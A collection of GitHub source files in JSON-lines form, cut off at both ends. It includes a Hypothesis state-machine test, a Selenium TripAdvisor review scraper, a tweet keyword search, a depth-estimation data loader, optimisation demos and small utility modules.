RuleBasedStateMachine\n\nfrom bees.env import Env\nfrom bees.utils import timing\nfrom bees.tests import strategies as bst\n\n# pylint: disable=no-value-for-parameter, protected-access\n\n\nclass EnvironmentMachine(RuleBasedStateMachine):\n \"\"\" Finite-state machine for testing ``Env`` multi agent environment. \"\"\"\n\n @timing\n @given(env=bst.envs())\n def __init__(self, env: Env):\n super(EnvironmentMachine, self).__init__()\n self.env = env\n\n @initialize()\n @timing\n def reset(self) -> None:\n env = self.env\n obs = env.reset()\n for agent_id, agent_obs in obs.items():\n\n # Calculate correct number of each object type.\n correct_obj_nums = {obj_type: 0 for obj_type in env.obj_type_ids.values()}\n for dx, dy in product(range(-env.sight_len, env.sight_len + 1), repeat=2):\n x = env.agents[agent_id].pos[0] + dx\n y = env.agents[agent_id].pos[1] + dy\n if (x, y) not in product(range(env.width), range(env.height)):\n continue\n for obj_type in env.obj_type_ids.values():\n correct_obj_nums[obj_type] += int(env.grid[x][y][obj_type])\n\n # Calculate number of each object type in returned observations.\n observed_obj_nums = {obj_type: 0 for obj_type in env.obj_type_ids.values()}\n for dx, dy in product(range(-env.sight_len, env.sight_len + 1), repeat=2):\n for obj_type in env.obj_type_ids.values():\n observed_obj_nums[obj_type] += int(agent_obs[obj_type][dx][dy])\n\n assert correct_obj_nums == observed_obj_nums\n\n @rule()\n @timing\n @given(data=st.data())\n def update_pos(self, data: st.DataObject) -> None:\n pos = data.draw(bst.positions(env=self.env))\n move = data.draw(bst.moves(env=self.env))\n new_pos = self.env._update_pos(pos, move)\n\n if pos[0] != new_pos[0]:\n assert pos[1] == new_pos[1]\n assert abs(pos[0] - new_pos[0]) == 1\n if pos[1] != new_pos[1]:\n assert pos[0] == new_pos[0]\n assert abs(pos[1] - new_pos[1]) == 1\n\n @rule()\n def dummy(self) -> None:\n assert True\n\n\nesm = EnvironmentMachine.TestCase\nesm.settings = settings(max_examples=20, stateful_step_count=10, deadline=None)\n","repo_name":"langfield/bees","sub_path":"bees/tests/env/test_state_machine.py","file_name":"test_state_machine.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"150623739","text":"\"\"\"\nThis is an adapted Python script for TripAdvisor user profile scraping from Sanjanaekanayake's profile:\nhttps://github.com/Sanjanaekanayake/tripadvisor-user-profiles-scrapper/blob/main/getUserReviews.py\n\nChanges from the original script:\n* No limit for review count (previously 100)\n* Extra data extracted per review (rating and location)\n* Fixed bugs in the scraping process (removed try-catch block that concealed issues)\n* Added support for browser options to overcome the timeout issue caused in the latest release of Chrome driver\n* Added support for Firefox driver\n* Added progress bards to monitor scraper's progress\n\"\"\"\n\nimport os\nimport csv\nimport re\nimport time\nfrom tqdm import tqdm\n\n# import the webdriver, chrome driver is recommended\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom data_annotation.annotation_file_extractor import read_comments_from_files\n\noptions = Options()\n# options.add_argument('--headless')\noptions.add_argument('--hide-scrollbars')\noptions.add_argument('--disable-gpu')\noptions.add_argument('lang=en')\n\n# driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n# driver = webdriver.Firefox(GeckoDriverManager().install(), options=options)\n\ndriver = Firefox(executable_path=\"C:\\\\Users\\\\Sofia\\\\Downloads\\\\geckodriver-v0.28.0-win64\\\\geckodriver.exe\",\n firefox_options=options)\n\n# import the webdriver, chrome driver is recommended\ndriver.set_page_load_timeout(2)\nfilename = \"\"\ni = 0\n\n\ndef check_exists_by_xpath(xpath):\n \"\"\"\n Function to check if button exists in HTML to avoid miss-clicks\n :param xpath: The button's XPATH expression to be evaluated\n :return: True, if the button exists, false otherwise\n \"\"\"\n try:\n driver.find_element_by_xpath(xpath)\n except NoSuchElementException:\n return False\n return True\n time.sleep(2)\n\n\ndef write_csv(review_title, review_text, review_date, review_for, review_rating, review_location):\n \"\"\"\n Function to write review details to file\n :param review_title: The title of the review\n :param review_text: The text of the review\n :param review_date: The date the review was published\n :param review_for: The business the review refers to\n :param review_rating: The rating of the review\n :param review_location: The location of the business the review refers to\n :return: None, simply writes review to file\n \"\"\"\n with open(filename, mode='a', newline='', encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n writer.writerow([str(review_title), str(review_text), str(review_date), str(review_for), str(review_rating),\n str(review_location)])\n\n\ndef write_log(username, error):\n \"\"\"\n Writes error logs related to error in scraping user profiles\n :param username: The user profile the error refers to\n :param error: The error in the scraping process\n :return: None, simply writes the log file\n \"\"\"\n filename = \"scrape_bugs.log\"\n with open(filename, mode='a', newline='') as l:\n writer = csv.writer(l)\n writer.writerow([str(username), str(error)])\n\n\ndef get_user_reviews(URL, end_count):\n \"\"\"\n Get all reviews from a user's profile\n :param URL: The user's profile URL to be scraped\n :param end_count: The total number of reviews\n :return: None, simply calls function to write reviews to file\n \"\"\"\n try:\n element_privacy = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.CLASS_NAME, \"evidon-banner-acceptbutton\")))\n ActionChains(driver).move_to_element(element_privacy).click().perform()\n except:\n print(\"\\nNo cookie pop-up!\")\n\n reveiwstab = driver.find_element_by_xpath('//a[@data-tab-name=\"Reviews\"]')\n reveiwstab.click()\n time.sleep(2)\n\n if check_exists_by_xpath(\"//div[@id='content']\"):\n # to expand the review if show more button exists\n if check_exists_by_xpath(\"//span[@class='_1ogwMK0l']\"):\n showmorebutton = driver.find_element_by_xpath(\"//span[@class='_1ogwMK0l']\")\n showmorebutton.click()\n time.sleep(2)\n\n # Scrolls as much as possible to make all reviews appear and gets the total number of reviews\n while driver.find_elements_by_xpath(\"//div[@style='position:relative']/div\"):\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n review = driver.find_elements_by_xpath(\"//div[@style='position:relative']/div\")\n element_count = len(review)\n # covers the cases where review count is different than the one mentioned in TripAdvisor's contributions pop-up\n if end_count - 19 < element_count < end_count + 19:\n print(\"\\nReviews to be parsed: \" + str(element_count))\n break\n else:\n continue\n if element_count is None:\n element_count = []\n # iteration over all reviews\n for j in tqdm(range(element_count)):\n # name = review[j].find_element_by_xpath(\".//div[contains(@class, '_2fxQ4TOx')]\").text\n # extract title\n try:\n review_title = review[j].find_element_by_xpath(\".//div[contains(@class, '_3IEJ3tAK _2K4zZcBv')]\").text\n except NoSuchElementException:\n print(\"\\nCannot find title for this review.\")\n review_title = \"\"\n # extract date (if available)\n try:\n review_date = review[j].find_element_by_xpath(\".//div[contains(@class, '_3Coh9OJA')]\").text\n except NoSuchElementException:\n print(\"\\nCannot find date for this review.\")\n review_date = \"\"\n # extract reviewed business\n review_for = review[j].find_element_by_xpath(\".//div[contains(@class, '_2ys8zX0p ui_link')]\").text\n # Used later to open up review in new tab\n try:\n review_summary = review[j].find_element_by_xpath(\".//div[contains(@class, '_1kKLd-3D')]/a\").get_attribute(\n \"href\")\n except NoSuchElementException:\n print(\"\\nCannot find the element for this review.\")\n continue\n # extract reviewed business' location\n try:\n review_location = review[j].find_element_by_xpath(\".//div[contains(@class, '_7JBZK6_8 _20BneOSW')]\").text\n except NoSuchElementException:\n print(\"\\nCannot find location for this review.\")\n review_location = \"\"\n # extract rating\n review_rating = 5\n if check_exists_by_xpath(\"//span[@class='ui_bubble_rating bubble_40']\"):\n review_rating = 4\n elif check_exists_by_xpath(\"//span[@class='ui_bubble_rating bubble_30']\"):\n review_rating = 3\n elif check_exists_by_xpath(\"//span[@class='ui_bubble_rating bubble_20']\"):\n review_rating = 2\n if check_exists_by_xpath(\"//span[@class='ui_bubble_rating bubble_10']\"):\n review_rating = 1\n\n driver.execute_script(\"window.open('');\")\n driver.switch_to.window(driver.window_handles[1])\n driver.get(review_summary)\n time.sleep(2)\n\n # Get review full text\n if check_exists_by_xpath(\"//span[@class='fullText hidden']\"):\n try:\n read_more_button = driver.find_elements_by_xpath(\n \"//div[@class='reviewSelector']/div/div[2]/div[3]/div/p/span\")\n read_more_button[2].click()\n review_text = read_more_button[1].text\n except IndexError:\n review_details = driver.find_elements_by_xpath(\"//span[@class='fullText hidden']\")[0]\n review_text = review_details.text\n # print(\"\\n--------------1st IF: \" + review_text)\n elif check_exists_by_xpath(\"//span[@class='fullText ']\"):\n try:\n read_more_button = driver.find_elements_by_xpath(\n \"//div[@class='reviewSelector']/div/div[2]/div[3]/div/p/span\")\n review_text = read_more_button[0].text\n except IndexError:\n review_details = driver.find_elements_by_xpath(\"//span[@class='fullText ']\")[0]\n review_text = review_details.text\n # print(\"\\n************2nd IF: \" + review_text)\n elif check_exists_by_xpath(\"//p[@class='partial_entry']\"):\n review_details = driver.find_elements_by_xpath(\"//p[@class='partial_entry']\")[0]\n review_text = review_details.text\n # print(\"\\n-----------3rd IF: \" + review_text)\n elif check_exists_by_xpath(\"//div[@class='entry vrReviewText']\"):\n review_details = driver.find_elements_by_xpath(\"//div[@class='entry vrReviewText']\")[0]\n review_text = review_details.text\n # print(\"\\n^^^^^^^^^^^4rd IF: \" + review_text)\n else:\n review_details = driver.find_elements_by_xpath(\n \"//div[@class='reviewSelector']/div/div[2]/div/div/div[3]/div/p\")\n try:\n review_text = review_details[0].text\n except IndexError:\n review_text = \"\"\n print(\"Cannot find text for this review.\")\n # print(\"\\n$$$$$$$$$$5th IF: \" + review_text)\n\n driver.close()\n driver.switch_to.window(driver.window_handles[0])\n # print(\"Review to be written to file: \" + review_title)\n # print(review_text)\n write_csv(review_title, review_text, review_date, review_for, review_rating, review_location)\n\n\ndef get_user_profile_by_url(URL):\n \"\"\"\n Based on the given URL, we scrape the respective user's profile\n :param URL: The profile URL to be scraped\n :return: None, simply handles the scraping process and writes to file\n \"\"\"\n print(\"\\nScraping: \" + URL)\n # get the name of place for csv file name\n global filename\n\n driver.get(URL)\n driver.maximize_window()\n\n # get review count from the contributions pop-up element\n element = WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.CLASS_NAME, \"_1q4H5LOk\")))\n ActionChains(driver).move_to_element(element).click().perform()\n time.sleep(1)\n # The text \"x reviews\" where x is the number of user's reviews\n count_text_elements = driver.find_elements_by_class_name(\"_3wryStHh\")\n # Flag to check if the user has any reviews\n reviews_available = False\n for element in count_text_elements:\n if 'reviews' in element.text or 'review' in element.text:\n count_text = element.text\n reviews_available = True\n if not reviews_available:\n print(\"\\nThe user does not have any reviews.\")\n return\n\n # The above string stripped of non-numeric characters and adjusted for thousands\n count = int(re.sub(\"[^0-9]\", \"\", count_text).replace(\",\", \"\"))\n # Click X for the contributions pop-up\n driver.find_element_by_class_name(\"_2EFRp_bb._9Wi4Mpeb\").click()\n time.sleep(1)\n\n # username as the filename\n username = driver.find_element_by_class_name(\"gf69u3Nd\").text\n\n filename = os.path.join('output_profiles', username + \".csv\")\n print('\\nReady to scrape ' + username + \"'s profile with \" + str(count) + \" reviews.\")\n\n # open csv file and add titles only if they do not already exist\n if os.path.isfile(filename):\n print(\"\\nUser profile is already parsed. Continuing!\")\n return\n with open(filename, mode='w', encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n writer.writerow(\n [str('reviewTitle'), str('review_details'), str('reviewDate'), str('reviewFor'), str(\"reviewRating\"),\n str('reviewLocation')])\n\n end_count = count\n\n get_user_reviews(URL, end_count)\n print('\\nSaved reviews in page = ', str(end_count), ' user = ', filename)\n print()\n\n\n# Reads all user profiles' URLs from the users who have reviewed fishing tourism businesses\nURLs = read_comments_from_files()['reviewer_profile']\n\n# Reads a URL at a time and calls the scraping function\n# for url in tqdm(reversed(URLs)): # inverse order\nfor url in tqdm(URLs): # correct order\n try:\n driver.set_page_load_timeout(10)\n get_user_profile_by_url(url)\n except TimeoutException as e:\n isrunning = 0\n print('\\nThere is an issue, check again ' + url + \" & Exception: \" + str(e))\n driver.close()\n\n print()\n\nprint('\\nProgram is complete.')\ndriver.close()\n","repo_name":"syfantid/FishingTourismNLP","sub_path":"data_collection/scraper_user_profiles.py","file_name":"scraper_user_profiles.py","file_ext":"py","file_size_in_byte":12605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"6349196044","text":"import math\n\n\nclass TriangleCalculator:\n \"\"\" Класс-калькулятор площадей треугольников. \"\"\"\n\n @classmethod\n def area(cls, *args):\n \"\"\"\n Метод, который считает площадь по разным формулам,\n в зависимости от количества переданных аргументов.\n \"\"\"\n if len(args) == 2:\n cls.area_by_height(*args)\n if len(args) == 3:\n cls.area_by_angle(*args)\n\n @staticmethod\n def area_by_angle(a, b, angle):\n \"\"\" Формула площади по двум сторонам и углу между ними. \"\"\"\n return 0.5 * a * b * math.sin(angle)\n\n @staticmethod\n def area_by_height(a, h):\n \"\"\" Формула площади по основанию и высоте. \"\"\"\n return 0.5 * a * h\n\n\nif __name__ == '__main__':\n TriangleCalculator().area() # Работаем через экземпляр\n TriangleCalculator().area_by_height(5, 10) # Работаем через экземпляр\n\n TriangleCalculator.area() # Работаем через класс\n TriangleCalculator.area_by_height(5, 10) # Работаем через класс\n","repo_name":"ValeryKharkov/PythonPY200","sub_path":"Атрибуты и методы/Практические задания/task10_Figure_classmethod_staticmethod/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"18312715497","text":"import numpy as np\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nfrom torchvision.transforms import functional as TF\nfrom PIL import Image\nfrom io import BytesIO\nimport random\n\ndef _is_pil_image(img):\n return isinstance(img, Image.Image)\n\ndef _is_numpy_image(img):\n return isinstance(img, np.ndarray) and (img.ndim in {2, 3})\n\nclass RandomHorizontalFlip(object):\n def __call__(self, sample):\n image, depth = sample['image'], sample['depth']\n\n if not _is_pil_image(image):\n raise TypeError(\n 'img should be PIL Image. Got {}'.format(type(image)))\n if not _is_pil_image(depth):\n raise TypeError(\n 'img should be PIL Image. Got {}'.format(type(depth)))\n\n if random.random() < 0.5:\n image = image.transpose(Image.FLIP_LEFT_RIGHT)\n depth = depth.transpose(Image.FLIP_LEFT_RIGHT)\n\n return {'image': image, 'depth': depth}\n\nclass RandomChannelSwap(object):\n def __init__(self, probability):\n from itertools import permutations\n self.probability = probability\n self.indices = list(permutations(range(3), 3))\n\n def __call__(self, sample):\n image, depth = sample['image'], sample['depth']\n if not _is_pil_image(image): raise TypeError('img should be PIL Image. Got {}'.format(type(image)))\n if not _is_pil_image(depth): raise TypeError('img should be PIL Image. Got {}'.format(type(depth)))\n if random.random() < self.probability:\n image = np.asarray(image)\n image = Image.fromarray(image[...,list(self.indices[random.randint(0, len(self.indices) - 1)])])\n return {'image': image, 'depth': depth}\n\nclass RandomGamma(object):\n \"\"\"\n Apply Random Gamma Correction to the images\n \"\"\"\n def __init__(self, gamma=0):\n self.gamma = gamma\n\n def __call__(self, sample):\n image, depth = sample['image'], sample['depth']\n if self.gamma == 0:\n return {'image': image, 'depth': depth}\n else:\n gamma_ratio = random.uniform(1 / self.gamma, self.gamma)\n return {'image': TF.adjust_gamma(image, gamma_ratio, gain=1),\n 'depth': depth}\n\nfrom zipfile import ZipFile\ndef loadZipToMem(zip_file):\n # Load zip file into memory\n print('Loading dataset zip file...', end='')\n from zipfile import ZipFile\n input_zip = ZipFile(zip_file)\n data = {name: input_zip.read(name) for name in input_zip.namelist()}\n nyu2_train = list((row.split(',') for row in (data['data/nyu2_train.csv']).decode(\"utf-8\").split('\\n') if len(row) > 0))\n\n from sklearn.utils import shuffle\n nyu2_train = shuffle(nyu2_train, random_state=0)\n\n #if True: nyu2_train = nyu2_train[:40]\n\n print('Loaded ({0}).'.format(len(nyu2_train)))\n return data, nyu2_train\n\ndef extract_zip(input_zip):\n input_zip=ZipFile(input_zip)\n return {name: input_zip.read(name) for name in input_zip.namelist()}\n\nclass depthDatasetMemory(Dataset):\n def __init__(self, data, nyu2_train, transform=None):\n self.data, self.nyu_dataset = data, nyu2_train\n self.transform = transform\n\n def __getitem__(self, idx):\n sample = self.nyu_dataset[idx]\n image = Image.open( BytesIO(self.data[sample[0]]) )\n depth = Image.open( BytesIO(self.data[sample[1]]) )\n sample = {'image': image, 'depth': depth}\n if self.transform: sample = self.transform(sample)\n return sample\n\n def __len__(self):\n return len(self.nyu_dataset)\n\nclass ToTensor(object):\n def __init__(self,is_test=False, is_224=False):\n self.is_test = is_test\n self.is_224 = is_224\n\n def __call__(self, sample):\n crop_size = 16\n image, depth = sample['image'], sample['depth']\n image = image.crop((crop_size, crop_size, 640-crop_size, 480-crop_size))\n\n if self.is_224:\n image = image.resize((224, 224))\n else:\n image = image.resize((640, 480))\n\n image = self.to_tensor(image)\n\n depth = depth.crop((crop_size, crop_size, 640-crop_size, 480-crop_size))\n # depth = depth.resize((512, 384))\n # image = image.resize((304, 224))\n if self.is_224:\n depth = depth.resize((224, 224))\n else:\n depth = depth.resize((320, 240))\n\n if self.is_test:\n depth = self.to_tensor(depth).float() / 1000\n else: \n depth = self.to_tensor(depth).float() * 1000\n \n # put in expected range [0.1m, 10m]\n depth = torch.clamp(depth, 10, 1000) # sets depth between 0.1m and 10m. [0, 1] -> [0, 1000] = [0m, 10m]\n\n return {'image': image, 'depth': depth}\n\n def to_tensor(self, pic):\n if not(_is_pil_image(pic) or _is_numpy_image(pic)):\n raise TypeError(\n 'pic should be PIL Image or ndarray. Got {}'.format(type(pic)))\n\n if isinstance(pic, np.ndarray):\n img = torch.from_numpy(pic.transpose((2, 0, 1)))\n\n return img.float().div(255)\n\n # handle PIL Image\n if pic.mode == 'I':\n img = torch.from_numpy(np.array(pic, np.int32, copy=False))\n elif pic.mode == 'I;16':\n img = torch.from_numpy(np.array(pic, np.int16, copy=False))\n else:\n img = torch.ByteTensor(\n torch.ByteStorage.from_buffer(pic.tobytes()))\n # PIL image mode: 1, L, P, I, F, RGB, YCbCr, RGBA, CMYK\n if pic.mode == 'YCbCr':\n nchannel = 3\n elif pic.mode == 'I;16':\n nchannel = 1\n else:\n nchannel = len(pic.mode)\n img = img.view(pic.size[1], pic.size[0], nchannel)\n\n img = img.transpose(0, 1).transpose(0, 2).contiguous()\n if isinstance(img, torch.ByteTensor):\n return img.float().div(255)\n else:\n return img\n\nclass NormalizeImage(object):\n \"\"\"\n Apply Random Gamma Correction to the images\n \"\"\"\n def __init__(self, mean, std, inplace=False):\n self.mean = mean\n self.std = std\n self.inplace = inplace\n\n def __call__(self, sample_tensors):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image of size (C, H, W) to be normalized.\n\n Returns:\n Tensor: Normalized Tensor image.\n \"\"\"\n image_tensor, depth_tensor = sample_tensors['image'], sample_tensors['depth']\n return {'image': TF.normalize(image_tensor, self.mean, self.std, self.inplace),\n 'depth': depth_tensor}\n\n def __repr__(self):\n return self.__class__.__name__ + '(mean={0}, std={1})'.format(self.mean, self.std)\n\ndef getNoTransform(is_test=False, is_224=False):\n transforms_list = [ToTensor(is_test=is_test, is_224=is_224)]\n # if normalize_input:\n # transforms_list.append(NormalizeImage(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]))\n return transforms.Compose(transforms_list)\n\ndef getDefaultTrainTransform(is_224=False):\n transforms_list = [\n RandomHorizontalFlip(),\n RandomChannelSwap(0.1),\n RandomGamma(0.8),\n ToTensor(is_224=is_224)\n ]\n # if normalize_input:\n # transforms_list.append(NormalizeImage(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]))\n return transforms.Compose(transforms_list)\n\ndef getTrainingTestingData(batch_size, num_workers=8, is_224=False):\n data, nyu2_train = loadZipToMem('nyu_data.zip')\n\n transformed_training = depthDatasetMemory(data, nyu2_train, transform=getDefaultTrainTransform(is_224=is_224))\n transformed_testing = depthDatasetMemory(data, nyu2_train, transform=getNoTransform(is_224=is_224))\n\n return DataLoader(transformed_training, batch_size, shuffle=True, num_workers=num_workers), \\\n DataLoader(transformed_testing, batch_size, shuffle=False, num_workers=num_workers)\n","repo_name":"nianticlabs/wavelet-monodepth","sub_path":"NYUv2/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","stars":221,"dataset":"github-code","pt":"95"} +{"seq_id":"32711543056","text":"# coding=utf-8\nfrom urllib.parse import urlparse\n\n\nclass ParsedURL(object):\n \"\"\"\n Wrapper for urlparse that removes the copy/paste work of hostname, port, ssl, and path.\n \"\"\"\n\n __slots__ = [\"url\", \"host\", \"port\", \"path\", \"secure\", \"path\", \"urlparse\"]\n\n def __init__(self, url: str):\n self.url = url\n self.urlparse = urlparse(url)\n\n self.host = str(self.urlparse.hostname)\n self.secure = self.urlparse.scheme == \"https://\"\n\n # try/except because of URLs like http://127.0.0.1:4986″\n try:\n self.port = int(self.urlparse.port)\n except (ValueError, TypeError):\n self.port = None\n\n # Fill in the port if no ports are given.\n if not self.port:\n if self.secure:\n self.port = 443\n else:\n self.port = 80\n\n self.path = '/' if self.urlparse.path == '' else self.urlparse.path\n","repo_name":"general-programming/torspider","sub_path":"spidercommon/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"73172860471","text":"# Optimization of the 2d Rosen function\nimport autograd\nimport autograd.numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom utils import util\nfrom utils import optim\nfrom scipy.optimize import rosen, rosen_der, rosen_hess\nfrom scipy import optimize as opt\nimport scipy.linalg as la\n\n#http://people.duke.edu/~ccc14/sta-663/BlackBoxOptimization.html\n\ndef reporter(p):\n \"\"\"Reporter function to capture intermediate states of optimization.\"\"\"\n global ps\n #ps.append(p)\n ps.append(np.copy(p))\n\ndef plot_trace(ps, ttl):\n x = np.linspace(-5, 5, 100)\n y = np.linspace(-5, 5, 100)\n X, Y = np.meshgrid(x, y)\n Z = rosen(np.vstack([X.ravel(), Y.ravel()])).reshape((100,100))\n ps = np.array(ps)\n plt.figure(figsize=(12,4))\n plt.subplot(121)\n plt.contour(X, Y, Z, np.arange(10)**5)\n plt.plot(ps[:, 0], ps[:, 1], '-o')\n plt.plot(1, 1, 'r*', markersize=12) # global minimum\n plt.subplot(122)\n plt.semilogy(list(range(len(ps))), rosen(ps.T))\n plt.title(ttl)\n\n# Initial starting position\nx0 = np.array([4,-4.1])\n\n#logger = optim.OptimLogger(rosen, 1, 1, 1)\n\nps = [x0]\nres = opt.minimize(rosen, x0, method='Newton-CG', jac=rosen_der, hess=rosen_hess, callback=reporter)\nprint('\\nresults of Newton-CG')\nprint(res)\nplot_trace(ps, 'Newton, obj {:0.4f}'.format(res.fun))\n\nps = [x0]\nres = opt.minimize(rosen, x0, method='BFGS', jac=rosen_der, callback=reporter)\nprint('\\nresults of BFGS')\nprint(res)\nplot_trace(ps, 'BFGS, obj {:0.4f}'.format(res.fun))\n\nps = [x0]\nlr = 0.0001\nparams, obj = optim.sgd(rosen, rosen_der, x0, 100, reporter, optim.const_lr(lr), 0)\nprint('\\nGD final params {}'.format(params))\nplot_trace(ps, 'GD({:0.4f}), obj {:0.4f}'.format(lr, obj))\n\nps = [x0]\nlr = 0.0002\nparams, obj = optim.sgd(rosen, rosen_der, x0, 100, reporter, optim.const_lr(lr), 0)\nprint('\\nGD final params {}'.format(params))\nplot_trace(ps, 'GD({:0.4f}), obj {:0.4f}'.format(lr, obj))\n\nps = [x0]\nlr = 0.0004\nparams, obj = optim.sgd(rosen, rosen_der, x0, 100, reporter, optim.const_lr(lr), 0)\nprint('\\nGD final params {}'.format(params))\nplot_trace(ps, 'GD({:0.4f}), obj {:0.4f}'.format(lr, obj))\n\n\nps = [x0]\nparams, obj, lr = optim.autoadam(rosen, 'bisection', rosen, rosen_der, x0, 100, reporter)\nprint('\\nAdam final params {}'.format(params))\nplot_trace(ps, 'Adam(Bisection {:0.4f}), obj {:0.4f}'.format(lr, obj))\n\n\nplt.show()\n","repo_name":"krc3004/murphy_ml_python","sub_path":"examples/rosen_demo.py","file_name":"rosen_demo.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"20540864017","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n' a test module '\n\n__author__ = 'hualai yu'\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\n\n\ndef browser(browser='firefox'):\n try:\n if browser == 'firefox':\n driver = webdriver.Firefox()\n return driver\n elif browser == \"chrome\":\n driver = webdriver.Chrome()\n return driver\n elif browser == \"ie\":\n driver = webdriver.Ie()\n return driver\n elif browser == \"phantomjs\":\n driver = webdriver.PhantomJS()\n return driver\n else:\n print(\"Not found this browser,You can enter 'firefox', 'chrome', 'ie', or 'phantomjs'\")\n except Exception as msg:\n print(\"%s\" % msg)\n\n\nclass HuaLai:\n def __init__(self, driver):\n self.driver = driver\n\n def open(self, url, t='', timeout=10):\n self.driver.get(url)\n self.driver.maximize_window()\n\n try:\n WebDriverWait(self.driver, timeout, 1).until(EC.title_contains(t))\n except TimeoutException:\n print(\"open %s title error\" % url)\n except Exception as msg:\n print(\"Erroe:%s\" % msg)\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout, 1).until(EC.presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator, timeout=10):\n elements = WebDriverWait(self.driver, timeout, 1).until(EC.presence_of_all_elements_located(locator))\n return elements\n\n def click(self, locator):\n element = self.find_element(locator)\n element.click()\n\n def send_keys(self, locator, text):\n element = self.find_element(locator)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout, 1).until(EC.text_to_be_present_in_element(locator, text))\n print(result)\n except TimeoutException:\n print(\"元素没定位到:\" + str(locator))\n return False\n else:\n return result\n\n\nif __name__ == '__main__':\n driver = browser()\n driver1 = browser(\"chrome\")","repo_name":"yuhualai/Python_automation","sub_path":"Dome/test_003.py","file_name":"test_003.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"4005060239","text":"# -*- Coding: UTF-8 -*-\n#coding: utf-8\n\n# varFrase = 'VARIABLE WORD theme music SounD ... @ !'\n#\n# #### Test open file on python\nvariablePathFile = '/home/mark/Documents/Datasets/tweets2009Part00'\narrayVariablePathFile = [28]\narrayVariablePathFile[0] = \"/home/mark/Documents/Datasets/tweets2009Part00\"\n\n########## Better to get a quantitie on the directory\nquantitieFiles = 28\n\nfor indice in range(quantitieFiles):\n arrayVariablePathFile.append(\"/home/mark/Documents/Datasets/tweets2009Part0\"+str(indice))\n\nfor j in arrayVariablePathFile:\n print (j)\n######## Contagem de quantas linhas há no arquivo\n# def file_lengthy(fname):\n# with open(fname) as f:\n# for i, l in enumerate(f):\n# pass\n# return i + 1\n#\n###linesFile = file_lengthy(variablePathFile)\n\nsearchBlack = 'black'\nsearchMonkey = 'monkey'\nsearchWord = 'Found !!! '\n\nfor indice in range(quantitieFiles):\n with open(arrayVariablePathFile[int(indice)],'r') as f:\n linesFile = f.read().split(\"\\n\")\n\n for i,line in enumerate(linesFile):\n if searchBlack in line and searchMonkey in line.split():\n #if searchMonkey in line:\n print(line)\n print(\"\\nWord \\\"{}\\\" found in line {}\".format(searchWord, i+1))\n#print(\"Number of lines in the file: \",file_lengthy(variablePathFile\n","repo_name":"MarkCarraschi/classification-implementation","sub_path":"SearchOnLoteOfData.py","file_name":"SearchOnLoteOfData.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72609090554","text":"from django.core.management.base import BaseCommand\nfrom stateapi.models import State\n\nclass Command(BaseCommand):\n help = 'Populate database with Nigerian states'\n\n def handle(self, *args, **options):\n states = [\n 'Abia', 'Adamawa', 'Akwa Ibom', 'Anambra', 'Bauchi',\n 'Bayelsa', 'Benue', 'Borno', 'Cross River', 'Delta',\n 'Ebonyi', 'Edo', 'Ekiti', 'Enugu', 'Gombe', 'Imo',\n 'Jigawa', 'Kaduna', 'Kano', 'Katsina', 'Kebbi', 'Kogi',\n 'Kwara', 'Lagos', 'Nasarawa', 'Niger', 'Ogun', 'Ondo',\n 'Osun', 'Oyo', 'Plateau', 'Rivers', 'Sokoto', 'Taraba',\n 'Yobe', 'Zamfara', 'FCT'\n ]\n\n for state_name in states:\n State.objects.create(name=state_name)\n\n self.stdout.write(self.style.SUCCESS('Successfully populated states'))","repo_name":"princewill-dev/NGN-states-api","sub_path":"stateapi/management/commands/populate_states.py","file_name":"populate_states.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31407495616","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n'''DCS Statistics v1 action implementations'''\nimport logging\n\nfrom osc_lib import utils\nfrom osc_lib.command import 